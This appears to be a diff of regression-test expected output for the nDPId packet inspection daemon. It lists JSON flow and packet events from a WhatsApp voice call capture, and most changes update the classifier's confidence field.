00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1561455741432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455741432,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClgs4AAAIRgsvAqAIM7\/\/\/+uDKB2wAkdIITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1561455741484,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455741484,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4hv4AAEABnOPAqAIMW\/w4MwMDoFgAAAAARQAA73IeAAAxEb\/8W\/w4M8CoAgx\/wNwIANsAAA=="} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1561455742405,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4TCgAAEAB17nAqAIMW\/w4MwMDoOEAAAAARQAAZumbAAAxEUkIW\/w4M8CoAgx\/wNwIAFIAAA=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1561455742405,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4HrIAAEABBTDAqAIMW\/w4MwMDoOEAAAAARQAAZp1RAAAxEZVSW\/w4M8CoAgx\/wNwIAFIAAA=="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 